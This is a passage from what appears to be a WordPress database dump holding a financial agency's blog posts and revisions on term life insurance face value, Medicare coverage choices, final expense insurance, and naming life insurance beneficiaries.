policy.\r\n\r\nYou may be wondering, can I increase the face value of my term life insurance policy?\r\n<h3>It Depends on the Policy</h3>\r\nThere are many policies that have a built-in benefit with a guaranteed purchase option that makes it possible to increase the face value of the policy. You can also often purchase riders to provide additional coverage. The additional riders would have the same expiration as the base term policy.\r\n<h3>Increasing Term Life Insurance</h3>\r\nThere is a term life insurance product known as increasing term life insurance, and it works like it sounds: with a face value that increases over the course of the term. Sometimes people who anticipate needing more life insurance (if they expect to have a family, a mortgage, or a higher income and expenses) choose increasing term insurance.\r\n\r\nAs the face value increases, the premium typically increases as well.\r\n<h3>Do Your Research</h3>\r\nIf you want to increase the face value of your term life insurance policy, check the terms and conditions of the policy to see if that’s an option. You can also contact the insurance company or your licensed insurance agent to see if you can add riders to your policy.\r\n\r\nAlways be sure to understand the benefits and limitations of any life insurance policy before you purchase it, especially if you think you might be interested in getting a policy in which you can increase the face value.\r\n\r\nIf you have any questions about increasing the face value of a term life insurance policy, contact a licensed insurance agent.','Can I Increase The Face Value Of My Term Life Insurance?','','inherit','closed','closed','','242-revision-v1','','','2023-03-13 13:02:40','2023-03-13 13:02:40','',242,'http://cmdev-site1.com/?p=244',0,'revision','',0),(399,3,'2023-03-19 17:43:20','2023-03-19 17:43:20','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nThere are many considerations to make when getting term life insurance, like which company to choose, how long of a term you should get, or who to name as the beneficiary. You also have to consider the policy’s face value.\r\n<h3>What is the Face Value?</h3>\r\nThe face value of a term life insurance policy is the benefit amount or the amount the beneficiary of the policy would get upon the death of the insured. The face value is determined when you purchase the policy.\r\n\r\nYou may be wondering, can I increase the face value of my term life insurance policy?\r\n<h3>It Depends on the Policy</h3>\r\nThere are many policies that have a built-in benefit with a guaranteed purchase option that makes it possible to increase the face value of the policy. You can also often purchase riders to provide additional coverage. The additional riders would have the same expiration as the base term policy.\r\n<h3>Increasing Term Life Insurance</h3>\r\nThere is a term life insurance product known as increasing term life insurance, and it works like it sounds: with a face value that increases over the course of the term. Sometimes people who anticipate needing more life insurance (if they expect to have a family, a mortgage, or a higher income and expenses) choose increasing term insurance.\r\n\r\nAs the face value increases, the premium typically increases as well.\r\n<h3>Do Your Research</h3>\r\nIf you want to increase the face value of your term life insurance policy, check the terms and conditions of the policy to see if that’s an option. You can also contact the insurance company or your licensed insurance agent to see if you can add riders to your policy.\r\n\r\nAlways be sure to understand the benefits and limitations of any life insurance policy before you purchase it, especially if you think you might be interested in getting a policy in which you can increase the face value.\r\n\r\nIf you have any questions about increasing the face value of a term life insurance policy, contact a licensed insurance agent.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Can I Increase The Face Value Of My Term Life Insurance?','','inherit','closed','closed','','242-revision-v1','','','2023-03-19 17:43:20','2023-03-19 17:43:20','',242,'http://cmdev-site1.com/?p=399',0,'revision','',0),(246,3,'2023-03-13 13:19:08','2023-03-13 13:19:08','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nMedicare is a federal health insurance program for people age 65 or older, certain people with disabilities, and people with End-Stage Renal Disease. As you near age 65, you’ll want to decide which type of Medicare coverage is best for you to enroll in Original Medicare (which can be paired with Medicare Supplement insurance) or Medicare Advantage.\r\n<h3>Public vs. Private</h3>\r\nOriginal Medicare, the public option, covers Medicare Part A and Part B. Medicare Part A helps cover hospital stays, care in skilled nursing facilities, hospice care, and some home health care.<sup>1</sup> Medicare Part B helps cover certain doctors’ services, preventative services, outpatient care, and medical supplies.<sup>1</sup>\r\n<h3>Original Medicare can be combined with Medicare Supplement Insurance</h3>\r\nMedicare Supplement insurance is meant to complement existing Original Medicare coverage to help with out of pocket expenses not covered.\r\n\r\nMedicare Supplement insurance can only be purchased when you have Original Medicare.\r\n<h3>Medicare Advantage</h3>\r\nMedicare Advantage Plans cover Medicare Part A, Part B, and usually Part D. They are offered by private companies approved by Medicare.\r\n\r\nMedicare Advantage cannot be combined with Medicare Supplement insurance.\r\n<h3>Original Medicare vs. Medicare Advantage</h3>\r\nBoth Original Medicare and Medicare Advantage allow you to use Medicare benefits, just in different ways.\r\n\r\nThis may seem like a lot to take in, so we’ve listed three factors you may want to consider when choosing the best Medicare coverage for you:\r\n<ol>\r\n 	<li>Hassle</li>\r\n 	<li>Coverage</li>\r\n 	<li>Choice</li>\r\n</ol>\r\n<h3>1. Hassle</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare and Medicare, Supplement insurance policies, can’t drop your coverage. Both are guaranteed renewable, which means that as long as the premiums are paid on time, you will continue to be covered.\r\n\r\n<strong>Medicare Advantage</strong>\r\nThe coverage period for Medicare Advantage plans is one year. They have limited guarantees when it comes to coverage. They can change every year, drop your coverage, or change the providers in your network.\r\n\r\nThe federal government requires that plan sponsors send an Annual Notice of Change, or ANOC, to participants. An ANOC is sent to you each fall and “includes any changes in coverage, costs, or service area that will be effective in January.”<sup>2</sup>\r\n<h3>2. Coverage</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare covers medical services and supplies in hospitals, doctors’ offices, and other healthcare settings. Services are either covered under Part A or Part B.\r\n\r\nMedicare Supplement insurance can help pay some of your out-of-pocket costs not covered by Medicare, like deductibles, coinsurance, copayments, etc.\r\n\r\n<strong>Medicare Advantage</strong>\r\nMedicare Advantage Plans cover Medicare Part A, Part B, and usually Part D. They are offered by private companies approved by Medicare. Medicare Supplement policies provide supplemental coverage for services that Original Medicare approves.\r\n<h3>3. Doctor and Hospital Choice</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare allows you to choose from any doctor in the United States that accepts Medicare.\r\n\r\nUnder Medicare Supplement insurance, you can go to a doctor or hospital that accepts Original Medicare. If a doctor accepts Medicare, they generally accept Medicare Supplement insurance.\r\n\r\n<strong>Medicare Advantage</strong>\r\nWith Medicare Advantage, you can choose from a network of doctors that the provider has preapproved.\r\n\r\nIf you are considering Medicare Advantage and want to stay with your doctor or hospital, ensure the doctor or hospital is in the plan\'s network.\r\n<h3>Conclusion</h3>\r\nConsider your needs and priorities for Medicare coverage as you near age 65.\r\n\r\nResearch whether Original Medicare—by itself or paired with Medicare Supplement insurance—or Medicare Advantage will better suit your needs.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 8pt;\"><em>Sources:</em>\r\n1. <a href=\"https://www.medicare.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">Medicare.gov</a>, Understanding Medicare Advantage Plans, 2020</span>\r\n<span style=\"font-size: 8pt;\">2. <a href=\"https://www.medicare.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">Medicare.gov</a>, Plan Annual Notice of Change (ANOC), 2020</span>','How Do You Choose The Best Medicare Coverage?','','publish','open','open','','how-do-you-choose-the-best-medicare-coverage','','','2023-03-19 17:43:54','2023-03-19 17:43:54','',0,'http://cmdev-site1.com/?p=246',0,'post','',0),(247,3,'2023-03-13 13:18:19','2023-03-13 13:18:19','Medicare choices on a blackboard','cloud services fr','','inherit','open','closed','','cloud-services-fr','','','2023-03-13 13:18:44','2023-03-13 13:18:44','',246,'http://cmdev-site1.com/wp-content/uploads/2023/03/Medicare-Choices-Advantage-1000x657-1.jpg',0,'attachment','image/jpeg',0),(248,3,'2023-03-13 13:18:48','2023-03-13 13:18:48','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nMedicare is a federal health insurance program for people age 65 or older, certain people with disabilities, and people with End-Stage Renal Disease. As you near age 65, you’ll want to decide which type of Medicare coverage is best for you to enroll in Original Medicare (which can be paired with Medicare Supplement insurance) or Medicare Advantage.\r\n<h3>Public vs. Private</h3>\r\nOriginal Medicare, the public option, covers Medicare Part A and Part B. Medicare Part A helps cover hospital stays, care in skilled nursing facilities, hospice care, and some home health care.<sup>1</sup> Medicare Part B helps cover certain doctors’ services, preventative services, outpatient care, and medical supplies.<sup>1</sup>\r\n<h3>Original Medicare can be combined with Medicare Supplement Insurance</h3>\r\nMedicare Supplement insurance is meant to complement existing Original Medicare coverage to help with out of pocket expenses not covered.\r\n\r\nMedicare Supplement insurance can only be purchased when you have Original Medicare.\r\n<h3>Medicare Advantage</h3>\r\nMedicare Advantage Plans cover Medicare Part A, Part B, and usually Part D. They are offered by private companies approved by Medicare.\r\n\r\nMedicare Advantage cannot be combined with Medicare Supplement insurance.\r\n<h3>Original Medicare vs. Medicare Advantage</h3>\r\nBoth Original Medicare and Medicare Advantage allow you to use Medicare benefits, just in different ways.\r\n\r\nThis may seem like a lot to take in, so we’ve listed three factors you may want to consider when choosing the best Medicare coverage for you:\r\n<ol>\r\n 	<li>Hassle</li>\r\n 	<li>Coverage</li>\r\n 	<li>Choice</li>\r\n</ol>\r\n<h3>1. Hassle</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare and Medicare, Supplement insurance policies, can’t drop your coverage. Both are guaranteed renewable, which means that as long as the premiums are paid on time, you will continue to be covered.\r\n\r\n<strong>Medicare Advantage</strong>\r\nThe coverage period for Medicare Advantage plans is one year. They have limited guarantees when it comes to coverage. They can change every year, drop your coverage, or change the providers in your network.\r\n\r\nThe federal government requires that plan sponsors send an Annual Notice of Change, or ANOC, to participants. An ANOC is sent to you each fall and “includes any changes in coverage, costs, or service area that will be effective in January.”<sup>2</sup>\r\n<h3>2. Coverage</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare covers medical services and supplies in hospitals, doctors’ offices, and other healthcare settings. Services are either covered under Part A or Part B.\r\n\r\nMedicare Supplement insurance can help pay some of your out-of-pocket costs not covered by Medicare, like deductibles, coinsurance, copayments, etc.\r\n\r\n<strong>Medicare Advantage</strong>\r\nMedicare Advantage Plans cover Medicare Part A, Part B, and usually Part D. They are offered by private companies approved by Medicare. Medicare Supplement policies provide supplemental coverage for services that Original Medicare approves.\r\n<h3>3. Doctor and Hospital Choice</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare allows you to choose from any doctor in the United States that accepts Medicare.\r\n\r\nUnder Medicare Supplement insurance, you can go to a doctor or hospital that accepts Original Medicare. If a doctor accepts Medicare, they generally accept Medicare Supplement insurance.\r\n\r\n<strong>Medicare Advantage</strong>\r\nWith Medicare Advantage, you can choose from a network of doctors that the provider has preapproved.\r\n\r\nIf you are considering Medicare Advantage and want to stay with your doctor or hospital, ensure the doctor or hospital is in the plan\'s network.\r\n<h3>Conclusion</h3>\r\nConsider your needs and priorities for Medicare coverage as you near age 65.\r\n\r\nResearch whether Original Medicare—by itself or paired with Medicare Supplement insurance—or Medicare Advantage will better suit your needs.\r\n\r\nContact a licensed insurance agent to ask questions and speak more on the topic.\r\n\r\n<span style=\"font-size: 8pt;\">Sources:\r\n1. <a href=\"https://www.medicare.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">Medicare.gov</a>, Understanding Medicare Advantage Plans, 2020</span>\r\n<span style=\"font-size: 8pt;\">2. <a href=\"https://www.medicare.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">Medicare.gov</a>, Plan Annual Notice of Change (ANOC), 2020</span>','How Do You Choose The Best Medicare Coverage?','','inherit','closed','closed','','246-revision-v1','','','2023-03-13 13:18:48','2023-03-13 13:18:48','',246,'http://cmdev-site1.com/?p=248',0,'revision','',0),(249,3,'2023-03-13 13:30:40','2023-03-13 13:30:40','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nNo matter your age, there is one expense we all have to plan for—our funeral. While it may not seem like the most uplifting topic to speak about, having a plan for your final expenses can help provide financial assistance to those responsible for making your funeral arrangements.\r\n\r\nIf you’re looking for a solution to cover costs, it may be time to consider final expense insurance.\r\n<h3>What is Final Expense Insurance?</h3>\r\nFinal expense insurance, also known as burial insurance or funeral insurance, is a type of life insurance policy designed to help pay for funeral services and merchandise costs upon the death of the insured.<sup>1</sup>\r\n\r\nIn other words, final expense insurance policies are designed to help pay for funeral related expenses such as body preparation, caskets, urns, and other related expenses.\r\n\r\nWith the average funeral cost ranging from $7,000 to $9,000 as of 2020,<sup>2</sup> having a policy in place to help cover costs may help alleviate the financial burden death can place on a grieving family.\r\n<h3>Who Should Consider Final Expense Insurance?</h3>\r\nDespite final expense insurance typically being marketed towards seniors, final expense insurance can be purchased by adults at any age. In fact, final expense insurance is often presented as “easy to get,” with some providers of final expense insurance not even asking for a completed medical exam to qualify.<sup>3</sup>\r\n\r\nFor those with complicated medical histories, seniors with limited to no beneficiaries, those with few to no financial responsibilities (e.g., mortgage, car payments, loans, etc.), or for those just looking to cover their funeral costs—final expense insurance may be well worth exploring.\r\n\r\nDue to the array of final expense insurance providers and products available, it’s essential you do your research before committing to any single policy. For any questions, we suggest contacting your local insurance agent or financial advisor.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n1. Investopedia, Burial Insurance, 2018, <a href=\"https://www.investopedia.com/terms/b/burial-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/terms/b/burial-insurance.asp</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">2. World Population Review, Average Funeral Costs By State 2020, 2020, <a href=\"https://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">https://worldpopulationreview.com/states/average-funeral-cost-by-state/</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">3. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference? 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a></span></em>','What Is Final Expense Insurance And Who Should Buy It?','','publish','open','open','','what-is-final-expense-insurance-and-who-should-buy-it','','','2023-03-19 17:44:19','2023-03-19 17:44:19','',0,'http://cmdev-site1.com/?p=249',0,'post','',0),(250,3,'2023-03-13 13:28:47','2023-03-13 13:28:47','Jigsaw puzzle with Franklin looking to you','Jigsaw puzzle with Franklin','','inherit','open','closed','','jigsaw-puzzle-with-franklin','','','2023-03-13 13:29:06','2023-03-13 13:29:06','',249,'http://cmdev-site1.com/wp-content/uploads/2023/03/Jigsaw-puzzle-with-Franklin-1000x674-1.jpg',0,'attachment','image/jpeg',0),(251,3,'2023-03-13 13:29:14','2023-03-13 13:29:14','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nNo matter your age, there is one expense we all have to plan for—our funeral. While it may not seem like the most uplifting topic to speak about, having a plan for your final expenses can help provide financial assistance to those responsible for making your funeral arrangements. If you’re looking for a solution to cover costs, it may be time to consider final expense insurance.\r\n<h3>What is Final Expense Insurance?</h3>\r\nFinal expense insurance, also known as burial insurance or funeral insurance, is a type of life insurance policy designed to help pay for funeral services and merchandise costs upon the death of the insured.<sup>1</sup>\r\n\r\nIn other words, final expense insurance policies are designed to help pay for funeral related expenses such as body preparation, caskets, urns, and other related expenses. With the average funeral cost ranging from $7,000 to $9,000 as of 2020,<sup>2</sup> having a policy in place to help cover costs may help alleviate the financial burden death can place on a grieving family.\r\n<h3>Who Should Consider Final Expense Insurance?</h3>\r\nDespite final expense insurance typically being marketed towards seniors, final expense insurance can be purchased by adults at any age. In fact, final expense insurance is often presented as “easy to get,” with some providers of final expense insurance not even asking for a completed medical exam to qualify.<sup>3</sup>\r\n\r\nFor those with complicated medical histories, seniors with limited to no beneficiaries, those with few to no financial responsibilities (e.g., mortgage, car payments, loans, etc.), or for those just looking to cover their funeral costs—final expense insurance may be well worth exploring.\r\n\r\nDue to the array of final expense insurance providers and products available, it’s essential you do your research before committing to any single policy. For any questions, we suggest contacting your local insurance agent or financial advisor.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n1. Investopedia, Burial Insurance, 2018, <a href=\"https://www.investopedia.com/terms/b/burial-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/terms/b/burial-insurance.asp</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">2. World Population Review, Average Funeral Costs By State 2020, 2020, <a href=\"https://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">https://worldpopulationreview.com/states/average-funeral-cost-by-state/</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">3. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference? 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a></span></em>','What Is Final Expense Insurance And Who Should Buy It?','','inherit','closed','closed','','249-revision-v1','','','2023-03-13 13:29:14','2023-03-13 13:29:14','',249,'http://cmdev-site1.com/?p=251',0,'revision','',0),(252,3,'2023-03-13 13:30:15','2023-03-13 13:30:15','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nNo matter your age, there is one expense we all have to plan for—our funeral. While it may not seem like the most uplifting topic to speak about, having a plan for your final expenses can help provide financial assistance to those responsible for making your funeral arrangements.\r\n\r\nIf you’re looking for a solution to cover costs, it may be time to consider final expense insurance.\r\n<h3>What is Final Expense Insurance?</h3>\r\nFinal expense insurance, also known as burial insurance or funeral insurance, is a type of life insurance policy designed to help pay for funeral services and merchandise costs upon the death of the insured.<sup>1</sup>\r\n\r\nIn other words, final expense insurance policies are designed to help pay for funeral related expenses such as body preparation, caskets, urns, and other related expenses.\r\n\r\nWith the average funeral cost ranging from $7,000 to $9,000 as of 2020,<sup>2</sup> having a policy in place to help cover costs may help alleviate the financial burden death can place on a grieving family.\r\n<h3>Who Should Consider Final Expense Insurance?</h3>\r\nDespite final expense insurance typically being marketed towards seniors, final expense insurance can be purchased by adults at any age. In fact, final expense insurance is often presented as “easy to get,” with some providers of final expense insurance not even asking for a completed medical exam to qualify.<sup>3</sup>\r\n\r\nFor those with complicated medical histories, seniors with limited to no beneficiaries, those with few to no financial responsibilities (e.g., mortgage, car payments, loans, etc.), or for those just looking to cover their funeral costs—final expense insurance may be well worth exploring.\r\n\r\nDue to the array of final expense insurance providers and products available, it’s essential you do your research before committing to any single policy. For any questions, we suggest contacting your local insurance agent or financial advisor.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n1. Investopedia, Burial Insurance, 2018, <a href=\"https://www.investopedia.com/terms/b/burial-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/terms/b/burial-insurance.asp</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">2. World Population Review, Average Funeral Costs By State 2020, 2020, <a href=\"https://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">https://worldpopulationreview.com/states/average-funeral-cost-by-state/</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">3. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference? 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a></span></em>','What Is Final Expense Insurance And Who Should Buy It?','','inherit','closed','closed','','249-revision-v1','','','2023-03-13 13:30:15','2023-03-13 13:30:15','',249,'http://cmdev-site1.com/?p=252',0,'revision','',0),(253,3,'2023-03-13 13:43:36','2023-03-13 13:43:36','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nPurchasing a life insurance policy may help your family in the event of your passing. A life insurance policy can help by paying out benefits to those you’ve chosen as beneficiaries.\r\n\r\nThis article will help explain what a beneficiary is and provide some tips that may help you decide who or what to name as one.\r\n<h3>What is a beneficiary?</h3>\r\nA beneficiary is the person, people, or entity to which a life insurance policy’s death benefit is paid, provided:\r\n<ul>\r\n 	<li>– The insured’s death occurs during the policy’s coverage period and</li>\r\n 	<li>– The insured is up-to-date on premium payments</li>\r\n</ul>\r\n<h3>Who or what can be named a beneficiary?</h3>\r\nThe following can be named as a beneficiary:<sup>1</sup>\r\n<ul>\r\n 	<li>– One person</li>\r\n 	<li>– Two or more people</li>\r\n 	<li>– The trustee of a trust you’ve set up</li>\r\n 	<li>– A charity</li>\r\n 	<li>– Your estate</li>\r\n</ul>\r\n<h3>What are the different types of beneficiaries?</h3>\r\nThere are primary and contingent beneficiaries.\r\n<h3>Primary beneficiary</h3>\r\nThe primary beneficiary is the first to receive the death benefit payable in the amount and method outlined by the insured’s life insurance policy, provided they can be found after the insured’s death.<sup>1</sup>\r\n<h3>Contingent beneficiary</h3>\r\nA contingent beneficiary receives the death benefit payable in the amount and method outlined by the insured’s life insurance policy, provided the primary beneficiary can’t be found after the insured’s death.<sup>1</sup>\r\n<h3>Types of contingent beneficiaries</h3>\r\n<ul>\r\n 	<li>– Secondary beneficiary — The secondary beneficiary would benefit from the life insurance payout if the primary beneficiary died before the insured or could not be located.</li>\r\n 	<li>– Tertiary beneficiary — If the primary and secondary beneficiaries die before the insured or cannot be located, the tertiary (third) beneficiary would receive the funds.</li>\r\n</ul>\r\n<h3>What happens if I don’t choose a beneficiary?</h3>\r\nIf you do not select a beneficiary, or if all your beneficiaries pass away before you do, the benefit will be issued pursuant to the terms of the policy.\r\n\r\nIn most cases, the benefit will be payable to the Estate of the Insured or the Estate of the Owner. Then depending on the laws in your state, you may need to probate the estate in order for the probate judge to determine how and to whom the estate assets are to be distributed.\r\n\r\nThere is a possibility that your estate — including your life insurance policy’s death benefit — will be taxed and/or subject to executor’s fees if it enters into probate. Probate laws and associated fees vary by state.\r\n<h3>How to choose your life insurance beneficiary(s)</h3>\r\nYou may be considering having a primary, secondary, and even more contingent beneficiaries an important part of planning for you and your family’s future.\r\n\r\nHere are some tips that may help you choose your life insurance beneficiary:\r\n<ul>\r\n 	<li><strong>– Identify your priorities.</strong>\r\nAsk yourself who you currently support financially. Do you want them to continue to be provided for financially if you were to pass?\r\n<ul>\r\n 	<li>Family — You may want to ensure that your family’s support continues for expenses such as college, weddings, or to pay off your mortgage. Maybe you want to leave a legacy to your children or grandchildren, helping to set them up for financial independence in their futures.</li>\r\n 	<li>Charity — Depending on the laws in your state, you may be able to designate a charitable interest as a beneficiary to leave the proceeds of your policy to a worthy organization such as a charity, non-profit, or church.</li>\r\n</ul>\r\n</li>\r\n 	<li><strong>– Specify your beneficiary clearly.</strong>\r\nInclude your beneficiaries’ full legal names, relationship to the Insured, and percentage share of the Insured’s death benefit. This may help your life insurance company find them as quickly and easily as possible, which may help your beneficiary receive the life insurance death benefit in as timely and efficient a manner as possible.<sup>1</sup></li>\r\n 	<li><strong>– Keep your choices up-to-date.</strong>\r\nYou may choose a primary beneficiary who dies before you. If your primary beneficiary dies before you, don’t forget to update your choice of beneficiary. If your beneficiary’s address changes, update their contact information.</li>\r\n 	<li><strong>– Have a contingency plan.</strong>\r\nDetail how the death benefit should be divided if you have multiple beneficiaries, per the <a href=\"https://www.iii.org/article/what-beneficiary\" target=\"_blank\" rel=\"noopener noreferrer\">Insurance Information Institute</a>.</li>\r\n 	<li><strong>– Avoid designating a minor as a beneficiary.</strong>\r\nSome states don’t allow minors to receive the full amount of benefits from life insurance proceeds — or any proceeds at all. One way to avoid this is by setting up a trust for your child. Another option is setting up a Uniform Transfers to Minors Act (UTMA) account. Per <a href=\"https://secure.ssa.gov/poms.nsf/lnx/0501120205\" target=\"_blank\" rel=\"noopener noreferrer\">SI 01120.205</a>, under the UTMA, “any kind of property, real or personal, tangible or intangible, can be transferred to a custodian for the benefit of a minor.”</li>\r\n 	<li><strong>– Take divorce into consideration.</strong>\r\nDepending on your state, the designation of an ex-spouse as a beneficiary under your life insurance policy may be automatically revoked upon divorce.</li>\r\n</ul>\r\nThis is not a comprehensive list of considerations to make when choosing a life insurance beneficiary.\r\n<h3>Carefully consider who or what you would like your beneficiary to be.</h3>\r\nA beneficiary is the person, people, or entity to which a life insurance policy’s stated death benefit is paid, provided the insured’s death occurs during the policy’s coverage period, and the insured is up-to-date on premiums paid. There are primary and contingent beneficiaries.\r\n\r\nSome tips detailed above that may help you choose your life insurance beneficiary include:\r\n<ul>\r\n 	<li>Identify your priorities.</li>\r\n 	<li>Specify your beneficiary clearly.</li>\r\n 	<li>Keep your choices up-to-date.</li>\r\n 	<li>Have a contingency plan.</li>\r\n 	<li>Avoid designating a minor as a beneficiary.</li>\r\n 	<li>Take divorce into consideration.</li>\r\n</ul>\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n<h5><em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Insurance Information Institute, What is a beneficiary?, 2021, <a href=\"https://www.iii.org/article/what-beneficiary\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.iii.org/article/what-beneficiary</a></span></em></h5>','Tips For Choosing A Life Insurance Beneficiary','','publish','open','open','','tips-for-choosing-a-life-insurance-beneficiary','','','2023-03-19 17:45:13','2023-03-19 17:45:13','',0,'http://cmdev-site1.com/?p=253',0,'post','',0),(254,3,'2023-03-13 13:40:29','2023-03-13 13:40:29','Beneficiary word cloud concept','Beneficiary word cloud','','inherit','open','closed','','beneficiary-word-cloud','','','2023-03-13 13:40:48','2023-03-13 13:40:48','',253,'http://cmdev-site1.com/wp-content/uploads/2023/03/Beneficiary-word-cloud-1000x667-1.jpg',0,'attachment','image/jpeg',0),(255,3,'2023-03-13 13:41:46','2023-03-13 13:41:46','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nPurchasing a life insurance policy may help your family in the event of your passing. A life insurance policy can help by paying out benefits to those you’ve chosen as beneficiaries.\r\n\r\nThis article will help explain what a beneficiary is and provide some tips that may help you decide who or what to name as one.\r\n<h3>What is a beneficiary?</h3>\r\nA beneficiary is the person, people, or entity to which a life insurance policy’s death benefit is paid, provided:\r\n<ul>\r\n 	<li>– The insured’s death occurs during the policy’s coverage period and</li>\r\n 	<li>– The insured is up-to-date on premium payments</li>\r\n</ul>\r\n<h3>Who or what can be named a beneficiary?</h3>\r\nThe following can be named as a beneficiary:<sup>1</sup>\r\n<ul>\r\n 	<li>– One person</li>\r\n 	<li>– Two or more people</li>\r\n 	<li>– The trustee of a trust you’ve set up</li>\r\n 	<li>– A charity</li>\r\n 	<li>– Your estate</li>\r\n</ul>\r\n<h3>What are the different types of beneficiaries?</h3>\r\nThere are primary and contingent beneficiaries.\r\n<h3>Primary beneficiary</h3>\r\nThe primary beneficiary is the first to receive the death benefit payable in the amount and method outlined by the insured’s life insurance policy, provided they can be found after the insured’s death.<sup>1</sup>\r\n<h3>Contingent beneficiary</h3>\r\nA contingent beneficiary receives the death benefit payable in the amount and method outlined by the insured’s life insurance policy, provided the primary beneficiary can’t be found after the insured’s death.<sup>1</sup>\r\n<h3>Types of contingent beneficiaries</h3>\r\n<ul>\r\n 	<li>– Secondary beneficiary — The secondary beneficiary would benefit from the life insurance payout if the primary beneficiary died before the insured or could not be located.</li>\r\n 	<li>– Tertiary beneficiary — If the primary and secondary beneficiaries die before the insured or cannot be located, the tertiary (third) beneficiary would receive the funds.</li>\r\n</ul>\r\n<h3>What happens if I don’t choose a beneficiary?</h3>\r\nIf you do not select a beneficiary, or if all your beneficiaries pass away before you do, the benefit will be issued pursuant to the terms of the policy.\r\n\r\nIn most cases, the benefit will be payable to the Estate of the Insured or the Estate of the Owner. Then depending on the laws in your state, you may need to probate the estate in order for the probate judge to determine how and to whom the estate assets are to be distributed.\r\n\r\nThere is a possibility that your estate — including your life insurance policy’s death benefit — will be taxed and/or subject to executor’s fees if it enters into probate. Probate laws and associated fees vary by state.\r\n<h3>How to choose your life insurance beneficiary(s)</h3>\r\nYou may be considering having a primary, secondary, and even more contingent beneficiaries an important part of planning for you and your family’s future.\r\n\r\nHere are some tips that may help you choose your life insurance beneficiary:\r\n<ul>\r\n 	<li><strong>– Identify your priorities.</strong>\r\nAsk yourself who you currently support financially. Do you want them to continue to be provided for financially if you were to pass?\r\n<ul>\r\n 	<li>Family — You may want to ensure that your family’s support continues for expenses such as college, weddings, or to pay off your mortgage. Maybe you want to leave a legacy to your children or grandchildren, helping to set them up for financial independence in their futures.</li>\r\n 	<li>Charity — Depending on the laws in your state, you may be able to designate a charitable interest as a beneficiary to leave the proceeds of your policy to a worthy organization such as a charity, non-profit, or church.</li>\r\n</ul>\r\n</li>\r\n 	<li><strong>– Specify your beneficiary clearly.</strong>\r\nInclude your beneficiaries’ full legal names, relationship to the Insured, and percentage share of the Insured’s death benefit. This may help your life insurance company find them as quickly and easily as possible, which may help your beneficiary receive the life insurance death benefit in as timely and efficient a manner as possible.<sup>1</sup></li>\r\n 	<li><strong>– Keep your choices up-to-date.</strong>\r\nYou may choose a primary beneficiary who dies before you. If your primary beneficiary dies before you, don’t forget to update your choice of beneficiary. If your beneficiary’s address changes, update their contact 